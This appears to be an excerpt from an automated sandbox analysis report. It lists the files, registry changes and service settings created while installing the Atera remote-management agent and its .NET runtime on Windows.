                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI72FF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBEDF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.Windows.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Native.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.CodePages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.TypeExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Serialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c9999.rbf (copy)Jump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Loader.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.HttpUtility.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Quic.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF2C.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.OpenSsl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.DispatchProxy.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebClient.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Linq.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB586.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28DE.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1CA.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB4E8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7187.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDDD3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI48B.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBB92.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF2C.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI66C4.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9B15.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI64A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA259.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC4E.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBD86.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI72FF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBEDF.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6A60.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E49.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC5.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBCF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDBCF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB586.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID8C1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FD.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\AteraSetupLog.txt
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\LICENSE.txtJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt

                                Boot Survival

                                barindex
                                Installs Task Scheduler Managed Wrapper
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                                Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBA524 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,37_2_00007FFB02EBA524
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
